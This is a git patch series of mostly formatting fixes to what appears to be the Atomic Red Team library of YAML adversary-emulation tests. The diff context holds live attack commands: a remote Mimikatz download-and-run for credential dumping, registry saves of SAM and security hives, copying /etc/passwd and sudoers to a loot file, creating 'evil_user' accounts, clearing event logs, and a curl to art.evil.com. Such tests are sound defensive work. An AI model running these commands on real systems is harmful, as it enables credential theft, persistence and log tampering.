From 9be4935b490cec2719c08a659dc385a70264992f Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Mon, 14 May 2018 14:19:29 +0100 Subject: [PATCH 1/5] changing args to input_arguments as per example --- atomics/t1087/t1087.yaml | 16 ++++++++-------- atomics/t1130/t1130.yaml | 8 ++++---- atomics/t1136/t1136.yaml | 16 ++++++++-------- 3 files changed, 20 insertions(+), 20 deletions(-) diff --git a/atomics/t1087/t1087.yaml b/atomics/t1087/t1087.yaml index d063354a..b39ce7ee 100644 --- a/atomics/t1087/t1087.yaml +++ b/atomics/t1087/t1087.yaml @@ -1,7 +1,7 @@ --- attack_technique: t1087 display_name: Account Discovery - + atomic_tests: - name: List all accounts description: | @@ -14,7 +14,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/passwd > #{output_file} @@ -30,7 +30,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/sudoers > #{output_file} @@ -46,7 +46,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | grep 'x:0:' /etc/passwd > #{output_file} @@ -57,7 +57,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: sh command: | username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username @@ -67,13 +67,13 @@ atomic_tests: xxx supported_platforms: - linux - - macos - args: + - macos + input_arguments: output_file: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | lastlog > #{output_file} diff --git a/atomics/t1130/t1130.yaml b/atomics/t1130/t1130.yaml index deb6f7a5..dd7feeb6 100644 --- a/atomics/t1130/t1130.yaml +++ b/atomics/t1130/t1130.yaml @@ -1,14 +1,14 @@ --- attack_technique: t1130 display_name: Install Root Certificate - + atomic_tests: - name: Install root CA on CentOS/RHEL description: | Creates a root CA with openssl supported_platforms: - linux - args: + input_arguments: key_filename: description: Key we create that is used to create the CA certificate type: Path @@ -17,7 +17,7 @@ atomic_tests: description: Path of the CA certificate we create type: Path default: rootCA.crt - executor: + executor: name: sh command: | openssl genrsa -out #{key_filename} 4096 @@ -37,4 +37,4 @@ atomic_tests: # To test the new trust, apply the root certificate or another signed with it to # a SSL/TLS web service and attempt a connection with curl or wget. # -# curl https://art.evil.com \ No newline at end of file +# curl https://art.evil.com diff --git a/atomics/t1136/t1136.yaml b/atomics/t1136/t1136.yaml index 0679a59b..42bd191b 100644 --- a/atomics/t1136/t1136.yaml +++ b/atomics/t1136/t1136.yaml @@ -1,7 +1,7 @@ --- attack_technique: t1136 display_name: Create Account - + atomic_tests: - name: Create a user account on a Linux system description: | @@ -9,15 +9,15 @@ atomic_tests: supported_platforms: - linux input_arguments: - username: + username: description: Username of the user to create type: String default: evil_user - comment: + comment: description: Comment to record when creating the user type: String default: Evil Account - executor: + executor: name: bash command: | useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} @@ -27,16 +27,16 @@ atomic_tests: Creates a user on a MacOS system with dscl supported_platforms: - macos - args: - username: + input_arguments: + username: description: Username of the user to create type: String default: evil_user - realname: + realname: description: "'realname' to record when creating the user" type: String default: Evil Account - executor: + executor: name: bash command: | dscl . -create /Users/#{username} From f8230f11bb711415d1506e2586c592781fce67c6 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Sun, 27 May 2018 15:06:09 +0100 Subject: [PATCH 2/5] Changing keywords to match the rest of the atomic test files. Also formating of the files such as --- and capitalising some of the attack_technique values --- atomics/T1002/T1002.yaml | 4 +--- atomics/T1003/T1003.yaml | 15 +++++++-------- atomics/T1085/T1085.yaml | 1 + atomics/T1087/T1087.yaml | 2 +- atomics/T1105/T1105.yaml | 6 +++--- atomics/T1117/T1117.yaml | 1 + atomics/T1118/T1118.yaml | 1 + atomics/T1121/T1121.yaml | 1 + atomics/T1127/T1127.yaml | 1 + atomics/T1130/T1130.yaml | 2 +- atomics/T1136/T1136.yaml | 2 +- atomics/T1139/T1139.yaml | 6 +++--- atomics/T1148/T1148.yaml | 2 +- atomics/T1170/T1170.yaml | 1 + atomics/T1179/T1179.yaml | 1 + 15 files changed, 25 insertions(+), 21 deletions(-) diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 93950e31..35167ada 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -27,7 +27,7 @@ atomic_tests: TODO supported_platforms: - windows - input_argument: + input_arguments: input_file: description: Path that should be compressed into our output file type: Path @@ -44,11 +44,9 @@ atomic_tests: - name: Data Compressed - nix description: | TODO - supported_platforms: - linux - macos - executor: name: sh command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 2226eac7..a833cda1 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -13,7 +13,7 @@ atomic_tests: description: URL to a remote Mimikatz script that dumps credentials type: Url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: + executor: name: powershell command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds @@ -23,7 +23,7 @@ atomic_tests: https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 supported_platforms: - windows - executor: + executor: name: command_prompt command: | gsecdump -a @@ -33,26 +33,25 @@ atomic_tests: http://www.ampliasecurity.com/research/windows-credentials-editor/ supported_platforms: - windows - input_argument: + input_arguments: output_file: description: Path where resulting data should be placed type: Path default: output.txt - executor: + executor: name: command_prompt command: | wce -o #{output_file} - name: Registry dump of SAM, creds, and secrets description: | - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 supported_platforms: - windows - executor: + executor: name: command_prompt command: | - reg save HKLM\sam sam + reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security - diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index b7546064..d6a37515 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1085 display_name: Rundll32 atomic_tests: diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 747f138c..95b599c3 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -68,7 +68,7 @@ atomic_tests: supported_platforms: - linux - macos - args: + input_arguments: output_file: description: Path where captured results will be placed type: Path diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 7f089be6..c4b29d73 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1105 +attack_technique: T1105 display_name: Remote File Copy - + atomic_tests: - name: xxxx description: | @@ -9,7 +9,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: bash command: | ### TODO: Not sure how to handle commands that need to be run on multiple systems diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 7a216646..b801b26c 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1117 display_name: Regsvr32 atomic_tests: diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index 7b52837b..7f9c9f89 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1118 display_name: InstallUtil diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 304149a9..d510af56 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1121 display_name: RegSvcs/RegAsm diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 287d94b1..a66b9942 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1127 display_name: Trusted Developer Utilities atomic_tests: diff --git a/atomics/T1130/T1130.yaml b/atomics/T1130/T1130.yaml index dd7feeb6..ffb45f99 100644 --- a/atomics/T1130/T1130.yaml +++ b/atomics/T1130/T1130.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1130 +attack_technique: T1130 display_name: Install Root Certificate atomic_tests: diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index 42bd191b..09da49e7 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1136 +attack_technique: T1136 display_name: Create Account atomic_tests: diff --git a/atomics/T1139/T1139.yaml b/atomics/T1139/T1139.yaml index 41ce03b0..9f1685e8 100644 --- a/atomics/T1139/T1139.yaml +++ b/atomics/T1139/T1139.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1139 +attack_technique: T1139 display_name: Bash History - + atomic_tests: - name: xxxx description: | @@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - bash_history_filename: + bash_history_filename: description: Path of the bash history file to capture type: Path default: ~/.bash_history diff --git a/atomics/T1148/T1148.yaml b/atomics/T1148/T1148.yaml index f69f79d0..d95d2623 100644 --- a/atomics/T1148/T1148.yaml +++ b/atomics/T1148/T1148.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1146 +attack_technique: T1146 display_name: HISTCONTROL atomic_tests: diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 8cc1478f..47916540 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1170 display_name: Mshta diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index 556c0c92..b5e77bb3 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1179 display_name: Hooking From 070378925198bc980e484e8712cdb19b1fca8608 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Sun, 27 May 2018 15:42:23 +0100 Subject: [PATCH 3/5] formatting --- atomics/T1007/T1007.yaml | 2 +- atomics/T1028/T1028.yaml | 2 +- atomics/T1033/T1033.yaml | 2 +- atomics/T1053/T1053.yaml | 4 ++-- atomics/T1124/T1124.yaml | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 14219028..ace23084 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - servicename: + service_name: description: Name of service to start stop, query type: string default: svchost.exe diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 883ae0d4..6342ac94 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml @@ -27,7 +27,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of Computer type: string default: computer1 diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 438a4281..639eb0a8 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -10,7 +10,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of remote computer type: strong default: computer1 diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index 9ca0a045..9484ef5a 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -54,11 +54,11 @@ atomic_tests: description: Target type: String default: localhost - UserName: + user_name: description: Username DOMAIN\User type: String default: DOMAIN\user - Password: + password: description: Password type: String default: At0micStrong diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0af7b43f..95c5e025 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: computer name to query type: string default: computer1 From d83d060c0d04a73448bcd19dddd7893c74aa5d00 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Wed, 30 May 2018 09:51:49 +0100 Subject: [PATCH 4/5] Spelling mistake on password --- atomics/T1048/T1048.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index d7c6aa09..8ab2033c 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -24,7 +24,7 @@ atomic_tests: description: username for domain type: string default: atomic - passowrd: + password: description: password for user type: string default: atomic From df6ed4a300a16352bdfaf85b445e560a76d60e05 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Thu, 31 May 2018 00:52:47 +0100 Subject: [PATCH 5/5] Formatting --- .DS_Store | Bin 0 -> 8196 bytes atomics/T1050/T1050.yaml | 2 -- atomics/T1070/T1070.yaml | 9 --------- atomics/T1098/T1098.yaml | 4 ---- atomics/T1173/T1173.yaml | 1 - atomics/T1197/T1197.yaml | 2 -- 6 files changed, 18 deletions(-) create mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..b44f269c7f97bd0f8f00bf00ddc8e3a3fa76bf85 GIT binary patch literal 8196 zcmeHM-EPw`82#LCG~GZe(xmM&H%MHJshbcLLP(|Cgevi;Wv~lCUD9S-v^1I8lnzQ! zZ+Hjb4R{o;xa2{2063p*rX<~vxIs+Vl6@TeJC1$)Ij&tI5{*G;jcA#OEJVi2Jd!g4 z*K?c-1zmC#D8MJ$CzslkP`?>YS(^f*fKk9GU=%P47zO?X1+Zsxu+G`{Rjo;l0!D%V zQUU%x*ocgEjT43P(}6@D0e~|omH~O310=`RSl2jFD5+>uogRdy3Vp;7ijI1l&4G1| z6NQRSLeWX+Hw%425%TTe+0vXuU7<;h0!D#p1^Db!BOnRmVay|p*&AM0^`@s7iwpH!>gM4>n{d#PkubJpCIxtGpiJaiH_8T1=& z?>Rp`ag#$&=Xc^bJk7h_v%nv=DvKL&l(<3U_ar&!_%L~~8$_LW*oX&Fr!U)aRE1@g zt#YffJQ}Unsw?(-wK`t0N4IaTt=P9}weh%YEnQo?+uZBEelvPIe)kbWLJ;~(NDJ!u zH2s8JPLx+pFAC%6fN6+D@-T5xPO9&yNl$WxHs~=uf@5q`lN$6Cxuz^}Fu`5wWcdX* z$6v(MpYZh408<&jT_U*1KBkvl#HS%jdUV8>Md>Lke9g5}qWiG!f*DXqe%4yL=7*GP zUd~#hry<_crlTB>-6+kQrw16_25n))4$@Wh`Gk@zOS*2FH47G$#0XDvmh5vxg|6AwZ|6iaHnXVcIi~@hEfSB2IHXC5c zUHuF;@A5X{9wG;}n<$hNB$*!qcs~8Z5P2J>%&BXfC`1W@xd@Oln8YaXR~7gPIk+Yw literal 0 HcmV?d00001 diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index 38434dfd..36cd2050 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,8 +20,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 1c5e738e..c9319649 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -6,7 +6,6 @@ atomic_tests: - name: Clear Logs description: | Clear Windows Event Logs - supported_platforms: - windows input_arguments: @@ -14,33 +13,25 @@ atomic_tests: description: Windows Log Name, ex System type: String default: System - executor: name: command_prompt command: | evtutil cl #{log_name} - - name: FSUtil description: | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - supported_platforms: - windows - input_arguments: - executor: name: command_prompt command: | fsutil usn deletejournal /D C: - - name: rm -rf description: | Delete system and audit logs - supported_platforms: - macos - linux - executor: name: sh command: | diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 43baa340..05886865 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -6,12 +6,8 @@ atomic_tests: - name: Admin Account Manipulate description: | Manipulate Admin Account Name - supported_platforms: - windows - - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1173/T1173.yaml b/atomics/T1173/T1173.yaml index 6a38bc08..55b6d044 100644 --- a/atomics/T1173/T1173.yaml +++ b/atomics/T1173/T1173.yaml @@ -12,7 +12,6 @@ atomic_tests: executor: name: manual - command: | steps: | Open Microsoft Word diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 8ef540f0..53753e6d 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -10,7 +10,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: executor: name: command_prompt command: | @@ -21,7 +20,6 @@ atomic_tests: and execute a payload leveraging PowerShell supported_platforms: - windows - input_arguments: executor: name: powershell command: |